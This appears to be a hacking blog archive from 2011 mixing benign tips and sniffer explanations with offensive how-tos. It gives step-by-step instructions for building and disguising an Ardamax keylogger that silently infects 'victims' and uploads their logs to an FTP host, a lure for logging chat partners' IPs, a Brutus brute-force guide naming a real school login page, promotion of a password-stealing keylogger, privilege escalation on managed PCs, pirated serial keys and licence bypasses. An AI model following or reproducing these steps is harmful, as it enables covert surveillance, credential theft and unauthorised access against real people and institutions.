Saturday, January 8, 2011

How To Sign Out of Gmail Account Remotely ?

Sign Out of Gmail Account Remotely
Gmail is one of the most widely used email services, and it has a lot of features. One of its security features is known as remote logout. Many of us use more than one computer to log in to our Gmail account. Sometimes we leave the browser open without logging out of Gmail, or we are in a cyber cafe when a power cut or computer failure occurs. If the computer is at the office or in any public place, your account may be hacked or misused by someone else.
But there is a method by which you can log out of your Gmail account remotely.
Open your Gmail account and go to the bottom of the page, where you will see something like the screenshot below.
[Screenshot: gmail-remote-logout]
Now click on “Details”, which opens a pop-up with details about your last sessions. Click on “Sign out all other sessions” to sign out of Gmail everywhere except the current session.
With this simple feature you can check whether your Gmail account has been hacked or not.

How to Get Someone's IP Through AIM/MSN/Chat ?

Found a great website that logs IPs and gives you the lat/long./isp.
1)Create Account
http://www.chatrack.frihost.net/index-1.php
2)Get one of the links and tell someone on AIM or whatever to click it, choose any of the images and tell them you painted it or some stupid shit like that.
3)When they look at the image, it logs their IP.
4)Bonus points:
-Tell them its animated and 20 seconds in it will change, this allows the website to have time to ensure all their info is retrieved.

How To Get A Facebook Email Address ?

How to Get Facebook Email Address
Facebook has just introduced a new feature that gives email addresses to users. At this time the Facebook email ID is not open to everyone; you have to request an invitation. To get an invite to this new service, visit the following link, where you will be asked to click on the ‘Request Invite’ button.
http://www.facebook.com/about/messages/

[Screenshot: Facebook-email-address-Invite]
If you are lucky you will get the yourname@facebook.com email ID as soon as possible. Please note that your email address will match your public username, for example:
Profile: facebook.com/username
Then your email address will be
Email: username@facebook.com
If you don’t have a username, you can go to facebook.com/username/ to get one, or click below:
http://www.facebook.com/username/

Ardamax 2.8 Key+ tutorial

Screen Shot Of Version 2.6

Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8. The reason is that with Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", whereas if you use Ardamax 2.8, it will just infect their PC when they click it; nothing comes up, it'll just auto-install.

I. Get Ardamax 2.8:



1. Once you've downloaded it, you'll see a little notepad icon in your taskbar, now right-hand click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says

Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'

II. Creating the Keylogger Engine:

2. Now you're going to make the Keylogger Engine (the thing you give to your victim). Click 'Remote Installation...', then click 'Next' until you get to Appearances.

3. Now that you're at Appearances, click 'Additional components' and un-tick 'Log Viewer' as done in the screenshot.

4. Now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

5. Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.

6. Now you should be at 'Web Update', just click 'Next' when you're here.

7. Ok, you should now be at 'Options'. This all depends on you: if you want your Keylogger to be a secret on your computer so your family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'.
(Remember, if in future you want to make a new Keylogger Engine, then press CTRL + SHIFT + ALT + H at the same time.)

8. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only if log size exceeds', once thats done, it should all look like it does in this screenshot:

cont: Now you should be at 'FTP'. Create a free account at http://www.drivehq.com/secure/FreeSignup...m=storage, then make sure you're at 'Online Storage' and make a new folder called: Logs (this is where the logs are sent to when you keylog someone). Now, in the FTP settings of Ardamax Keylogger, where it says 'FTP Host:', put this:

http://ftp.drivehq.com

Now where it says 'Remote Folder:', put this: Logs

Now where it says 'Username:' and 'Password:', put your DriveHQ username and password, then it should look something like this

Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.

10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.

11. Now you should be at 'Destination'. Here you have to choose where to put your Keylogger Engine: where it says 'Keylogger engine path:', click 'browse' and choose where you want to put your Keylogger Engine.

12. Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.

III. Binding the Keylogger Engine with another file:

13. Download Easy Binder 2.0

Download:

RapidShare: 1-CLICK Web hosting - Easy Filehosting


PLEASE NOTE THAT YOU WILL NEED THE .NET FRAMEWORK v2.0 IN ORDER TO RUN THE BINDER GET IT HERE:
x64:

http://www.Mcft.com/downloads/details.as...laylang=en

x86:

http://www.Mcft.com/downloads/details.as...laylang=en

14. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to wherever you put the Keylogger Engine and then click the file called 'Install'.

15. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.

16. You need to get a .ico image, this is easy, just go to FavIcon from Pics -- how to create a favicon.ico for your website and upload the Image you want to be converted to .ico, once its done, click 'download'.

17. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so:

18. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to be saved, put the name you want on the file and then click 'Save'.

19. Go to 'File's' on the Binder and then click 'Bind File's'. Now this new file you've just made is the keylogger and an image in one; if you're doing this with Ardamax 2.8 then when your victim opens the file, a harmless image comes up and their PC also gets infected with Ardamax Keylogger.

Now spread and enjoy your logs!

Well have fun with it.

http://www.Serials.ws
 
Key: TVOGVGCPMUFCORA OR Name: Ziggy - SnD Team Serial: POFLCUHWBWAVYKL OR e37843hr73h74rhu OR UCCCBXOPYOMXACN OR TUQTNNQUOUPPQUQ

Wednesday, January 5, 2011

Sniffers - Tool and Softwares: Network Sniffers


Tool: Windump

  • WinDump is the Windows port of tcpdump, the most widely used network sniffer/analyzer for UNIX.

The port is currently based on version 3.5.2. WinDump is fully compatible with tcpdump and can be used to watch and diagnose network traffic according to various complex rules.

WinDump is simple to use and works at the command prompt level. The syntax that we have used as seen in our screenshot here, is Windump -n -S -vv. The -n option tells Windump to display IP addresses instead of the computers' names. The -S option indicates that the actual TCP/IP sequence numbers should be shown. If this option is omitted, relative numbers will be shown. The -vv options make the output more verbose, adding fields such as time to live and IP ID number to the sniffed information.
Let's take a closer look at how WinDump records various types of packets. Here's a TCP example, which shows a data packet with the PUSH and ACK flags set. First, we have the WinDump log entry for the packet. Immediately after it is the same entry, but with an explanation added for each field:
20:50:00.037087 IP (tos 0x0, ttl 128, id 2572, len 46) 192.168.2.24.1036 > 64.12.24.42.5190: P [tcp sum ok] 157351:157357(6) ack 2475757024 win 8767 (DF)
The above entry can be deciphered as 20:50:00.037087 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 2572, len 46) 192.168.2.24.1036 [source IP:port] > 64.12.24.42.5190: [destination IP:port] P [push flag] [tcp sum ok] 157351:157357 [sequence numbers] (6) [bytes of data] ack 2475757024 [acknowledgement and sequence number] win 8767 [window size] (DF) [don't fragment set]
The next example is UDP.
20:50:11.190427 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 6071, len 160) 192.168.2.28.3010 [source IP:port] > 192.168.2.1.1900: [destination IP:port] udp [protocol] 132
ICMP log entry looks as given below.
20:50:11.968384 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 8964, len 60) 192.168.2.132 [source IP] > 192.168.2.1: [destination IP] icmp [protocol type] 40: [Time to live] echo request seq 43783 [sequence number]
Finally, WinDump will also capture ARP requests and replies.
20:50:37.333222 [timestamp] arp [protocol] who-has 192.168.2.1 [destination IP] tell 192.168.2.118 [source IP]
20:50:37.333997 [timestamp] arp [protocol] reply 192.168.2.1 [destination IP] is-at 0:a0:c5:4b:52:fc [MAC address]
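
As an added example (not part of the original post), the following Python sketch parses the -n -S -vv log lines shown above into structured fields, which is the usual first step before filtering or alerting on a capture. The sample lines are the page's own entries with the bracketed annotations removed; the Packet class and the function names are illustrative.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# "<time> IP (tos .., ttl .., id .., len ..) <src> > <dst>: <rest>"
IP_LINE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{6}) IP "
    r"\(tos (?P<tos>0x[0-9a-fA-F]+), ttl (?P<ttl>\d+), "
    r"id (?P<id>\d+), len (?P<len>\d+)\) "
    r"(?P<src>\S+) > (?P<dst>\S+): (?P<rest>.*)$"
)
# TCP tail: flags, optional checksum note, optional seq range, ack, window
TCP_REST = re.compile(
    r"^(?P<flags>[SFPRWE.]+)(?= |$)(?: \[[^\]]*\])?"
    r"(?: (?P<s>\d+):(?P<e>\d+)\((?P<n>\d+)\))?"
    r"(?: ack (?P<ack>\d+))?(?: win (?P<win>\d+))?"
)
ICMP_REST = re.compile(r"^icmp \d+: (?P<type>.+?)(?: seq (?P<seq>\d+))?$")


@dataclass
class Packet:
    timestamp: str
    proto: str
    src_ip: str
    src_port: Optional[int]
    dst_ip: str
    dst_port: Optional[int]
    ttl: int
    ip_id: int
    ip_len: int
    detail: dict = field(default_factory=dict)


def _endpoint(text, has_port):
    """Split '192.168.2.24.1036' into ('192.168.2.24', 1036)."""
    if not has_port:
        return text, None
    ip, _, port = text.rpartition(".")
    return ip, int(port)


def parse_line(line):
    """Return a Packet for an IP log line, or None for anything else."""
    m = IP_LINE.match(line.strip())
    if not m:
        return None
    rest, detail = m["rest"], {}
    if rest.startswith("udp "):
        proto = "udp"
        detail["udp_len"] = int(rest.split()[1])
    elif rest.startswith("icmp "):
        im = ICMP_REST.match(rest)
        if not im:
            return None
        proto = "icmp"
        detail["type"] = im["type"]
        detail["seq"] = int(im["seq"]) if im["seq"] else None
    else:
        tm = TCP_REST.match(rest)
        if not tm:
            return None
        proto = "tcp"
        detail = {
            "flags": tm["flags"],
            "seq_start": int(tm["s"]) if tm["s"] else None,
            "seq_end": int(tm["e"]) if tm["e"] else None,
            "payload_bytes": int(tm["n"]) if tm["n"] else 0,
            "ack": int(tm["ack"]) if tm["ack"] else None,
            "win": int(tm["win"]) if tm["win"] else None,
            "df": rest.rstrip().endswith("(DF)"),
        }
    has_port = proto in ("tcp", "udp")
    src_ip, src_port = _endpoint(m["src"], has_port)
    dst_ip, dst_port = _endpoint(m["dst"], has_port)
    return Packet(m["ts"], proto, src_ip, src_port, dst_ip, dst_port,
                  int(m["ttl"]), int(m["id"]), int(m["len"]), detail)


def parse_capture(lines):
    """Parse every IP line; non-IP lines (for example ARP) are skipped."""
    return [p for p in map(parse_line, lines) if p is not None]


# The page's entries with the bracketed annotations removed.
SAMPLE = [
    "20:50:00.037087 IP (tos 0x0, ttl 128, id 2572, len 46) "
    "192.168.2.24.1036 > 64.12.24.42.5190: P [tcp sum ok] "
    "157351:157357(6) ack 2475757024 win 8767 (DF)",
    "20:50:11.190427 IP (tos 0x0, ttl 128, id 6071, len 160) "
    "192.168.2.28.3010 > 192.168.2.1.1900: udp 132",
    "20:50:11.968384 IP (tos 0x0, ttl 128, id 8964, len 60) "
    "192.168.2.132 > 192.168.2.1: icmp 40: echo request seq 43783",
    "20:50:37.333222 arp who-has 192.168.2.1 tell 192.168.2.118",
]

if __name__ == "__main__":
    for pkt in parse_capture(SAMPLE):
        print(pkt)
```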

Sniffers - Tool and Softwares: Network Sniffers

There are three main modes in which Snort can be configured: sniffer, packet logger, and network intrusion detection system.
  • Sniffer mode simply reads the packets off of the network and displays them for you in a continuous stream on the console.
  • Packet logger mode logs the packets to the disk.
  • Network intrusion detection mode is the most complex and configurable configuration, allowing Snort to analyze network traffic for matches against a user-defined rule set.

The main distribution site for Snort is http://www.snort.org. Snort is distributed under the GNU GPL license by the author Martin Roesch. Snort is a lightweight network IDS, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching.

Snort logs packets in either tcpdump binary format or in Snort's decoded ASCII format to logging directories that are named based on the IP address of the foreign host. In our lab, we start using Snort as a packet sniffer and a packet analyzer. Apart from running in a promiscuous mode, we will also see how it will help us log interesting IPs. Using Snort as a packet sniffer and packet analyzer is an easy process. The man pages are very helpful.
From the command line prompt we set Snort to a verbose display of the packets sniffed and analyzed. e.g. - The command given below captures all the packets belonging to the class C internal IP's of the type 192.168.20.*.
C:\>snort -v -d -e -i eth0 -h 192.168.20.0/24 -l log
The '-v' switch brings forth a verbose response.
The '-d' switch helps in dumping the decoded application layer data
While '-e' shows the decoded Ethernet headers.
The '-i' switch specifies the interface to be monitored for packet analysis.
The '-h' switch specifies which class of network packets has to be captured.
The -l option tells snort to dump the packets in the log file.
The packets are captured in hex format by default (this can be changed to binary -b) and sorted by IP address to facilitate easy mapping and decoding of data.
06/22-16:36:44.959860 0:C1:26:E:AF:10 -> 0:A0:C5:4B:52:FC type:0x800 len:0x4D
192.168.2.96:1629 -> 203.124.250.69:53 UDP TTL:128 TOS:0x0 ID:38429 IpLen:20 DgmLen:63
Len: 43
00 02 01 00 00 01 00 00 00 00 00 00 03 77 77 77 .............www
09 61 69 72 6C 69 6E 65 72 73 03 6E 65 74 00 00 .airliners.net..
01 00 01 ...

Sniffers - Tool: Ethereal

Ethereal is a free network protocol analyzer for UNIX and Windows. It allows the user to examine data from a live network or from a capture file on disk. Interactive browsing of the captured data, viewing summary and detailed information for each packet are part of the basic functionality of the sniffer. Ethereal has several powerful features, including a display filter language and the ability to view the reconstructed stream of a TCP session.

Recent versions of Ethereal have included many enhancements to the interface. Live data can be read from Ethernet, FDDI, PPP, Token-Ring, IEEE 802.11, Classical IP over ATM, and loopback interfaces (at least on some platforms; not all of those types are supported on all platforms). Let us take a closer look. We run Ethereal over the LAN (which is not switched) and take a look at the captured data. We sort by the protocol and notice a POP session.
Ethereal lets us follow the entire conversation as shown in the screenshot below.


We are able to reconstruct the client-server conversation as displayed by two different colors. We are able to make out the email service provider, the user name and password from the reconstruction of the sniffed packets. That is not all. We were also able to pick a chat thread from the thousands of packets that passed by in the two minutes.

Sniffers - An Introduction

Introduction to Packet Sniffing
From Tony Bradley, CISSP, MCSE2k, MCSA, A+
It's a cruel irony in information security that many of the features that make using computers easier or more efficient and the tools used to protect and secure the network can also be used to exploit and compromise the same computers and networks. This is the case with packet sniffing.
A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used legitimately by a network or system administrator to monitor and troubleshoot network traffic. Using the information captured by the packet sniffer an administrator can identify erroneous packets and use the data to pinpoint bottlenecks and help maintain efficient network data transmission.
In its simple form a packet sniffer simply captures all of the packets of data that pass through a given network interface.
Typically, the packet sniffer would only capture packets that were intended for the machine in question. However, if placed into promiscuous mode, the packet sniffer is also capable of capturing ALL packets traversing the network regardless of destination.
By placing a packet sniffer on a network in promiscuous mode, a malicious intruder can capture and analyze all of the network traffic. Within a given network, username and password information is generally transmitted in clear text which means that the information would be viewable by analyzing the packets being transmitted.
A packet sniffer can only capture packet information within a given subnet. So, it's not possible for a malicious attacker to place a packet sniffer on their home ISP network and capture network traffic from inside your corporate network (although there are ways that exist to more or less "hijack" services running on your internal network to effectively perform packet sniffing from a remote location). In order to do so, the packet sniffer needs to be running on a computer that is inside the corporate network as well. However, if one machine on the internal network becomes compromised through a Trojan or other security breach, the intruder could run a packet sniffer from that machine and use the captured username and password information to compromise other machines on the network.
Detecting rogue packet sniffers on your network is not an easy task. By its very nature the packet sniffer is passive. It simply captures the packets that are traveling to the network interface it is monitoring. That means there is generally no signature or erroneous traffic to look for that would identify a machine running a packet sniffer. There are ways to identify network interfaces on your network that are running in promiscuous mode though and this might be used as a means for locating rogue packet sniffers.
If you are one of the good guys and you need to maintain and monitor a network, I recommend you become familiar with network monitors or packet sniffers such as Ethereal. Learn what types of information can be discerned from the captured data and how you can put it to use to keep your network running smoothly. But, also be aware that users on your network may be running rogue packet sniffers, either experimenting out of curiosity or with malicious intent, and that you should do what you can to make sure this does not happen.
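
One way to run the promiscuous-mode check mentioned above on a single Linux host, as an added example that is not part of the original article: it reads the interface flags the kernel exposes under /sys/class/net and reports interfaces with IFF_PROMISC set. The `expected` allowlist parameter and the function names are illustrative assumptions, and the check covers only the host it runs on.

```python
import os

# Interface flag bits from <linux/if.h>
IFF_UP = 0x1
IFF_PROMISC = 0x100


def read_flags(if_dir):
    """Read the hex flags value (for example '0x1103') of one interface."""
    with open(os.path.join(if_dir, "flags")) as fh:
        return int(fh.read().strip(), 16)


def promiscuous_interfaces(sysfs_root="/sys/class/net", expected=()):
    """Return [(name, is_up)] for interfaces in promiscuous mode.

    expected: interface names that are allowed to be promiscuous
    (for example a dedicated IDS sensor port); they are not reported.
    """
    findings = []
    for name in sorted(os.listdir(sysfs_root)):
        if name in expected:
            continue
        try:
            flags = read_flags(os.path.join(sysfs_root, name))
        except (OSError, ValueError):
            # Not an interface directory, or unreadable: skip it.
            continue
        if flags & IFF_PROMISC:
            findings.append((name, bool(flags & IFF_UP)))
    return findings


if __name__ == "__main__":
    hits = promiscuous_interfaces()
    if not hits:
        print("no interface is in promiscuous mode")
    for name, is_up in hits:
        state = "up" if is_up else "down"
        print(f"{name}: promiscuous mode set (interface {state})")
```

Run it from a scheduled job on each host and alert on any interface that is not in the allowlist; a capture tool started on the host sets the flag for as long as it is listening.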

Julian Assange the Hacker

Yeah, you heard it right! The famous editor-in-chief of Wikileaks is a hacker. A hacker in the truer sense: he is one of the first hackers to implement ethical hacking.
Assange was self-taught at libraries and learned to program on early PCs.
Programming quickly became hacking once Assange got an Internet connection, and soon he was accessing government networks and bank mainframes. He was arrested in 1991 and charged with more than 30 criminal counts related to his hacking. Facing as many as 10 years in prison, Assange struck a plea deal.
During sentencing, the judge ruled that Assange only had to pay a fine. Assange's hacks were not malicious; they were the harmless result of “inquisitive intelligence,” said the judge.

How to Know the IP address of a person on Facebook.


This technique works when you are chatting with that person. The first demand of operation is to close all of the website and Messengers that you are using, even clean History and delete Cookies as precaution. Now start chatting with that person.

The first thing you do is to open start->run->cmd.exe now in it type following command:

netstat -an

Then wait and watch: the foreign address will be the IP address.

Another Way of getting Administrator right on XP

We all know that in colleges, offices and schools the administrator allocates a user account to each individual, and of course this user account has very few privileges. The admin also blocks us from accessing certain services such as the internet, or blocks certain ports such as the USB port. But did you know you can get all the administrative privileges (rights) for your user account? Yes, you can.
So let's see. There is a software called Windows NT password recovery which can be used to reset the password for any account in Windows. This software is also bootable from CD, which means that if you have a CD drive in your system, you can use this software without installing it.
Follow the steps:
#1 Download the ISO image from here and burn a CD with this ISO image file.
#2 Boot your computer using this bootable CD created in step 1. You may need to set your CD-ROM as first boot device in BIOS in order to boot from it.
#3 Once you boot your computer with this CD, you will get a command based interface which is quite self-explanatory. On first screen, press enter key to boot in default mode.
#4 After you boot, it gives option, it will show the drive partitions and will give the choice, “Please select the partition number.” Press enter if windows is installed on C drive, else select the appropriate partition.
#5 Now it will ask ” What is path of Windows directory ?”, press enter for default value.
#6 Now it will show option “Select which part of registry to load” . Type 1 and press enter.
#7 This will show the list of users on the windows. Type the username of the user for which you want to gain administrative privileges (rights).
#8 Now it will show following choices
1. Clear the password
2. Edit password
3. Promote user
4. Unlock account
5. Quit
Type 3 and press enter.
#9 After you press enter, it will show a warning. Type y and press enter to continue.
#10 Now type ! and press enter to come to previous menu, here type q to quit and press enter.
#11 It will now say, About to write files, at this type y and press enter.
#12 It will ask to Run again. Now take the CD out of the tray and restart your computer.
Its Done! This user will have administrator rights next time you restart your windows PC

Albertino Keylogger

Here is another free Keylogger called Abertino.
You can download it from link below.


Call absolutely free to any country

Using this VOIP program, you can call landline numbers in any country for FREE.

FreeCall is still a Freeware app but you only get 300 minutes a week.
 
To bypass this restriction:

http://www.freecall.com/en/download.html
 


Keep the setup.exe. Freecall's protection system is quite flawed, when the program announces you cannot use any more minutes = Uninstall and reinstall and it will reset your 300 minutes which only takes a moment.
 

A)You MUST make an account with the program when it loads up. Then when your logged in (it will say at the bottom: 'The client is logged on')
 

B)Go to the dial pad TAB, ignore the on screen buttons, at the bottom type in your number and remember you need to add country codes at the beginning - NO spaces in the number either.
 

C) And it does do all countries for free - i've used it from NZ to england, USA, Spain and Aussie and they used it back.
 

D) If it didn't work, you need to check your firewall settings etc, this is an obvious but a program like this needs full access. .

Digital Keylogger v3.0 by Nytro download

Well I promised you people that I will post about free Keyloggers. Here is First of them. Use it responsibly, but there is one problem with it, it is detected by antivirus. But still better than nothing

: Digital Keylogger v3.0 :::
:::: (c) Nytro 2008 ::::

Digital Keylogger v3.0 :

Made in Romania
Client size : 912 KB
Server size : 196 KB

New : Server captures all windows .
Server :

Copy file : C:\WINDOWS\system32\explorer.exe
Startup : Yes , SystemDriver
Disable Task Manager : No
Hidden Install : Yes
Icon : Yahoo! Messenger

No "Missing file error" for client and server .
Features :

- Get keylog Automat : You set how fast to receive the keylog from server .
- Get keylog Manual : Click "Get Keylog" to get the keylog from server .
- Close Y! : You will close victim's Yahoo! Messenger , the victim will login , and you will get his password . Server will disable "Remember ID & Password" and "Auto-Login" options if they are activated .
- Kill Server : The server will be deleted from victim's pc .
- Send Message : You can send a message to your victim . Message type will be critical , the title will be "Microsoft Windows" .
- Use Backspace : If you select Yes , if your victim press Backspace button , it will have an effect to your keylog . It will delete a char from keylog . If you select No , pressing Backspace button , won't have any effect .
- Save Log : You can save the keylog to your PC .
- System Tray : The client will move to System Tray , behind the clock . Just move mouse over his icon to restore it .
Download :
http://www.netdrive.ws/48170.html

Brutus Tutorial on How to use it

 

How to use Brutus.

Written by: ALEX
================================================== ========
I, The Author, take no responsibility for what you do with the information
that I am providing for you. This information is for educational purposes only.
================================================== ========

Chapter 1: Introduction to Brutus.

1.What is Brutus?

2.What can I do with it?

3 Where can I download Brutus?

4.Where can I find a good password list?


Chapter Two: Let's Get Cracking.

1.HTTP Form.

2.FTP.

3.POP3

4.Telnet.

5.SMB (Netbios)

6.Netbus

7.Custom.

Chapter Three: Wrapping up.

1.Contact Information.
========================================
Chapter One.

==What is Brutus?==

Brutus is a well known password brute forcing program.

==What can I do with it?==

With Brutus, you can brute force passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, and they also have a
"Custom" option so you can specify your own settings.

==Where can I download Brutus?==
You can find Brutus at its webpage www.hoobie.net/brutus
You can also find it at GluTuk's site www.spartandownloads.2ys.com

==Where can I find a good password list to use with Brutus?==
Pretty much the only password list you will ever need,
and it has 4.9 million passwords. Here is a link where you can download it.

Part 1.
http://area51archives.com/files/pass_list.rar

Part 2
http://area51archives.com/files/pass_list.rar

================================================== ============

Chapter Two: Let's Get Cracking.

Note: You can use a proxy for each cracking method.

==HTTP Form==

This is the option you would use if you want to crack into a website that has a field for a username and a pass, like
this one.

http://www.westbranch.k12.oh.us/staff/controls.asp

I will use this site for the rest of this section as well.

First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put
the above link into the Target form field, then click Learn Form Settings
From here, you click the field name that is for the username, in this case it is userid, once you have selected it,
click the username button that is shown above the cookie information. That tells brutus that that field is for the username.
Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you
need to fill that in with the response you get when you try to enter a password into your site. In this case the response is
"You have entered a wrong Password or username." For this target we will put that into the Primary response field Once this
is done, we click ok, add the IP into the Target Field and start our crack.

==FTP==

For cracking an FTP server, the default settings should remain how they are, I usually make sure that the "Try to stay
connected for unlimited attempts" box is ticked. That’s up to you, once you have selected your options, enter the IP and
begin the crack.

==POP3==

This is pretty much the same as FTP cracking as far as, the default settings should work for you. Once again, I like to
use the "Try to stay connected for unlimited attempts" option.

==Telnet==

Seems as if I'm repeating myself, but once again, the default settings should work for you.

==SMB (NetBIOS)==

If you happen to find yourself a target that has the NetBIOS port open (139) and has sharing enabled, but needs a
password, this is what you would use. Once again, default settings should work.

==Sub7==

Sub7 is a popular Trojan that sometimes, you might find a server that needs a password to connect.
This option is used for, cracking a password protected Sub7 server.

==Custom==

This is what you would use to set up a crack for anything else that you could think of. You need to find out what you need
to put in each field once you click "Define sequence" Those options will vary from target to target.

ARP Spoofing and Sniffing HTTPS and SSH

A possible way to sniff information would be to control an ARP table of a computer. ARP spoofing involves changing the MAC to IP address entries, causing traffic to be redirected from the legitimate system to an unauthorized system of the attacker's choice.
This is achieved by sending out a forged ARP packet to the target system, telling it that its default gateway has changed to the attacker's system. This way, whenever the target system sends traffic on the network, it will send it to the attacker's system first, which then forwards the packet on to its original destination as if nothing ever happened.



Attack Methods
Let us take a closer look at the attack methodology. There are switches that are not foiled by MAC flooding. These switches stop storing new MAC addresses once their memory reaches a given limit. In this scenario, an attacker can use DSniff's tool called arpspoof. arpspoof allows an attacker to manipulate ARP traffic on a LAN by redefining the ARP table.


Usually, such attempts are preceded by the scanning and enumeration phases, where the attacker draws up a map of the network and discovers the network topology. Looking at the network topology, the attacker can decipher the IP address of the default router for the LAN. He then sets up the attack by configuring the IP layer of the attacker's machine to forward any packet it receives from the LAN to the IP address of the default router (IP forwarding). The next step in the attack is sending the fake ARP replies to the victim's machine.
This ARP reply changes the victim's ARP table by remapping the default router's IP (layer 3) to the attacker's own MAC address (layer 2). The victim machine sends the data, forwarding it to what it thinks is the default router (but unknowingly using the attacker's MAC address).
The attacker sniffs the information using any kind of sniffing tool. The attacker's machine will promptly forward the victim's traffic to the default router on the LAN. Upon reaching the default router, the traffic is transmitted to the outside world. The attacker is now sniffing in a switched environment.
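
From the defender's side, the remapping described above is visible in the ARP traffic itself. The following added example (not from the original post) reads WinDump-style ARP lines and flags replies that nobody asked for and IP addresses whose MAC address changes. It assumes a capture point that sees both requests and replies; the second MAC address, the later timestamps and the 2-second window are constructed values.

```python
import re

ARP_REQ = re.compile(r"^(\S+) arp who-has (\S+) tell (\S+)")
ARP_REP = re.compile(r"^(\S+) arp reply (\S+) is-at ([0-9A-Fa-f:]+)")

# A reply counts as solicited if a who-has for that IP was seen this recently.
REPLY_WINDOW_SECONDS = 2.0


def to_seconds(ts):
    """Convert 'HH:MM:SS.ffffff' to seconds since midnight."""
    hours, minutes, seconds = ts.split(":")
    return int(hours) * 3600 + int(minutes) * 60 + float(seconds)


def norm_mac(mac):
    """Zero-pad each octet: '0:a0:c5:4b:52:fc' -> '00:a0:c5:4b:52:fc'."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def find_arp_anomalies(lines):
    """Return a list of (timestamp, kind, ip, detail) alerts.

    kind is 'unsolicited-reply' when no who-has preceded the reply within
    REPLY_WINDOW_SECONDS, and 'mac-changed' when the reply disagrees with
    the first MAC address recorded for that IP.
    """
    first_mac = {}      # ip -> first MAC seen in a reply (the baseline)
    last_request = {}   # ip -> time of the most recent who-has
    alerts = []
    for raw in lines:
        line = raw.strip()
        req = ARP_REQ.match(line)
        if req:
            last_request[req[2]] = to_seconds(req[1])
            continue
        rep = ARP_REP.match(line)
        if not rep:
            continue
        ts, ip, mac = rep[1], rep[2], norm_mac(rep[3])
        asked_at = last_request.get(ip)
        age = None if asked_at is None else to_seconds(ts) - asked_at
        if age is None or not (0 <= age <= REPLY_WINDOW_SECONDS):
            alerts.append((ts, "unsolicited-reply", ip, mac))
        baseline = first_mac.setdefault(ip, mac)
        if baseline != mac:
            alerts.append((ts, "mac-changed", ip, f"{baseline} -> {mac}"))
    return alerts


# First two lines are the page's ARP entries without the annotations;
# the last two are constructed to show a forged gateway mapping.
SAMPLE = [
    "20:50:37.333222 arp who-has 192.168.2.1 tell 192.168.2.118",
    "20:50:37.333997 arp reply 192.168.2.1 is-at 0:a0:c5:4b:52:fc",
    "20:51:02.100000 arp reply 192.168.2.1 is-at 2:0:0:0:0:99",
    "20:51:04.100000 arp reply 192.168.2.1 is-at 2:0:0:0:0:99",
]

if __name__ == "__main__":
    for alert in find_arp_anomalies(SAMPLE):
        print(*alert)
```

Static ARP entries for the default router, or dynamic ARP inspection on switches that support it, remove the need to rely on detection alone.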

What is Buffer Overflow?

Whenever a program is compiled, space is set aside for its input. The size of that input is defined at the time of programming. For example, if I have coded a program that asks for an input of 8 bytes (1 byte = 1 letter) and someone enters a 9-byte answer, the result is called a BUFFER OVERFLOW. In the hacking scene, exploits are written for these vulnerabilities, and by using such an exploit they execute the payload and take control of the machine.

How to run a trial software forever

In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?
Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.
When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that return the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.
NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a program and make it run in its trial mode forever.
1. Note down the date and time when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period has expired, do not run the software (program) directly. If you run the software directly even once, this hack may no longer work.
4. It is better and safer to inject the date of the last day of the trial period.
For example, if the trial period expires on Jan 30 2009, always inject the date as Jan 29 2009 in RunAsDate. I hope this helps! Please share your experience and opinions through comments.

How to hack a computer with Nmap and Metasploit

I have written different hacking articles about Nmap and Metasploit. Now I am writing this article to teach how to hack a computer using these two great tools.

Just go to http://www.metasploit.com/ and download the latest Framework (not the mini version).

Now open the Metasploit console and type the following commands:

